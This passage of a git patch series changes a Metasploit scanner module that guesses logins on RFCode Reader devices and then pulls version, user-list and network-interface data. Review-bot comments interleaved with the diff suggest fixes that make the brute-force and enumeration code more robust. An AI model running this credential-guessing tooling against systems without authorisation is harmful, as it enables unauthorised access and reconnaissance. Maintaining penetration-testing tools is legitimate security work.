) @@ -218,15 +220,16 @@ class Metasploit3 < Msf::Auxiliary }) eth0_info = JSON.parse(res.body)["eth0"] - vprint_status("#{rhost}:#{rport} -> Collecting interface info...") - print_good("#{rhost}:#{rport} -> Interface eth0 info: #{eth0_info}") + vprint_status("#{rhost}:#{rport} - Collecting interface info...") + print_good("#{rhost}:#{rport} - Interface eth0 info: #{eth0_info}") report_note( :host => rhost, :proto => 'tcp', :port => rport, :sname => "RFCode Reader", - :data => 'Interface eth0: #{eth0_info}' + :data => 'Interface eth0: #{eth0_info}', + :type => 'Info' ) return From ae027a9efba868826ad9884fb747552bc4bc29f6 Mon Sep 17 00:00:00 2001 
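Review bot: Adding `:type => 'Info'` supplies the missing field, but the `:data` line two lines above it is still single-quoted, so the stored note contains the literal `#{release_ver}` text rather than the value; the userlist and eth0 notes in this hunk are affected the same way. Switch those three strings to double quotes. The type name is also unusual: framework notes conventionally use lowercase dotted identifiers such as `'rfcode.version'`, `'rfcode.users'` and `'rfcode.eth0'`, which keeps the three notes distinguishable when queried, though that is convention rather than a hard requirement.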
From: jvazquez-r7 Date: Fri, 14 Jun 2013 13:09:48 -0500 Subject: [PATCH 9/9] Final cleanup for rfcode_reader_enum --- .../scanner/http/rfcode_reader_enum.rb | 84 +++++++++++-------- 1 file changed, 47 insertions(+), 37 deletions(-) diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb index 953124b98e..d64cb4939a 100644 --- a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb +++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptString.new('STOP_ON_SUCCESS', [true, 'Stop guessing when a credential works for a host', true]) + OptBool.new('STOP_ON_SUCCESS', [ true, "Stop guessing when a credential works for a host", true]) ], self.class) end @@ -125,7 +125,6 @@ class Metasploit3 < Msf::Auxiliary if not res or res.code == 401 vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect} with code #{res.code}") - return :skip_pass else print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") 
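Review bot: STOP_ON_SUCCESS is already registered by Msf::Auxiliary::AuthBrute (with a default of false, as far as I recall), so this OptBool line re-registers the same option only to flip its default to true; that is legitimate, but it reads like an accidental duplicate. A one-line comment above it would stop a later cleanup from deleting it: `# Re-registered to default STOP_ON_SUCCESS to true; AuthBrute's own default is false.`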
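Review bot: Dropping `return :skip_pass` is fine, but the failure branch kept `with code #{res.code}` under a condition that is entered when `res` is nil, so a request that gets no response ends do_login with NoMethodError rather than a logged failure, and none of the rescued classes cover it. `vprint_error("... with code #{res ? res.code : 'none'}")`, or `return :abort if res.nil?` ahead of the check, closes that. The success branch still accepts any non-401 status; a `res && res.code == 200` test would stop 403/500 responses being reported as working credentials. do_login's rescue and the rest of its body are outside this hunk.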
@@ -168,20 +167,22 @@ class Metasploit3 < Msf::Auxiliary } }) - release_ver = JSON.parse(res.body)["release"] - product_name = JSON.parse(res.body)["product"] + if res and res.body + release_ver = JSON.parse(res.body)["release"] + product_name = JSON.parse(res.body)["product"] - vprint_status("#{rhost}:#{rport} - Collecting device platform info...") - print_good("#{rhost}:#{rport} - Release version: '#{release_ver}', Product Name: '#{product_name}'") + vprint_status("#{rhost}:#{rport} - Collecting device platform info...") + vprint_good("#{rhost}:#{rport} - Release version: '#{release_ver}', Product Name: '#{product_name}'") - report_note( - :host => rhost, - :proto => 'tcp', - :port => rport, - :sname => "RFCode Reader", - :data => 'Release Version: #{release_ver}, Product: #{product_name}', - :type => 'Info' - ) + report_note( + :host => rhost, + :proto => 'tcp', + :port => rport, + :sname => "RFCode Reader", + :data => "Release Version: #{release_ver}, Product: #{product_name}", + :type => 'Info' + ) + end res = send_request_cgi( { @@ -194,19 +195,20 @@ class Metasploit3 < Msf::Auxiliary } }) - userlist = JSON.parse(res.body) - vprint_status("#{rhost}:#{rport} - Collecting user list...") - print_good("#{rhost}:#{rport} - User list & role: #{userlist}") - - report_note( - :host => rhost, - :proto => 'tcp', - :port => rport, - :sname => "RFCode Reader", - :data => 'User List & Roles: #{userlist}', - :type => 'Info' - ) + if res and res.body + userlist = JSON.parse(res.body) + vprint_status("#{rhost}:#{rport} - Collecting user list...") + vprint_good("#{rhost}:#{rport} - User list & role: #{userlist}") + report_note( + :host => rhost, + :proto => 'tcp', + :port => rport, + :sname => "RFCode Reader", + :data => "User List & Roles: #{userlist}", + :type => 'Info' + ) + end res = send_request_cgi( { 
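Review bot: The new `if res and res.body` guard does not do what it looks like: an empty body is `""`, which is truthy in Ruby, so `JSON.parse("")` is still reached and raises, and a 401/403 reply with an HTML body is parsed just the same. Check the status instead and parse once: `if res && res.code == 200` then `info = JSON.parse(res.body)` and read `info['release']` / `info['product']`. The userlist and eth0 blocks later in this commit repeat the same pattern.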
@@ -219,19 +221,27 @@ class Metasploit3 < Msf::Auxiliary } }) - eth0_info = JSON.parse(res.body)["eth0"] - vprint_status("#{rhost}:#{rport} - Collecting interface info...") - print_good("#{rhost}:#{rport} - Interface eth0 info: #{eth0_info}") + if res and res.body + eth0_info = JSON.parse(res.body)["eth0"] + vprint_status("#{rhost}:#{rport} - Collecting interface info...") + vprint_good("#{rhost}:#{rport} - Interface eth0 info: #{eth0_info}") - report_note( - :host => rhost, - :proto => 'tcp', - :port => rport, - :sname => "RFCode Reader", - :data => 'Interface eth0: #{eth0_info}', - :type => 'Info' - ) + report_note( + :host => rhost, + :proto => 'tcp', + :port => rport, + :sname => "RFCode Reader", + :data => "Interface eth0: #{eth0_info}", + :type => 'Info' + ) + end + return + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + vprint_error("#{rhost}:#{rport} - HTTP Connection Failed while collecting info") + return + rescue JSON::ParserError + vprint_error("#{rhost}:#{rport} - Unable to parse JSON response while collecting info") return end end
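Review bot: The two rescue clauses added at the end of collect_info wrap all three requests, so one unparseable reply from version.json abandons the userlist and interface lookups that might have succeeded, and because the message goes through vprint_error the reason is invisible unless VERBOSE is set. The three lookups are independent, so the fetch-and-parse step belongs in a helper that returns nil on a bad reply and lets each caller carry on; the version.json block then reduces to `info = fetch_json('/rfcode_reader/api/version.json', '1370460180056', user, pass)` with `if info` around the existing print and report_note lines. Whether a connection failure should still end the whole method is a judgment call; the helper below leaves Rex errors to the existing rescue.
```ruby
  # GET one RFCode Reader API path with Basic auth and return the parsed
  # JSON object, or nil when the reply is missing, not 200, or not JSON.
  # Connection errors are left to propagate to the caller's rescue.
  def fetch_json(path, dc, user, pass)
    res = send_request_cgi(
      {
        'uri'           => path,
        'method'        => 'GET',
        'authorization' => basic_auth(user, pass),
        'vars_get'      => { '_dc' => dc }
      })
    return nil unless res && res.code == 200 && res.body
    JSON.parse(res.body)
  rescue JSON::ParserError
    vprint_error("#{rhost}:#{rport} - #{path} did not return JSON")
    nil
  end
```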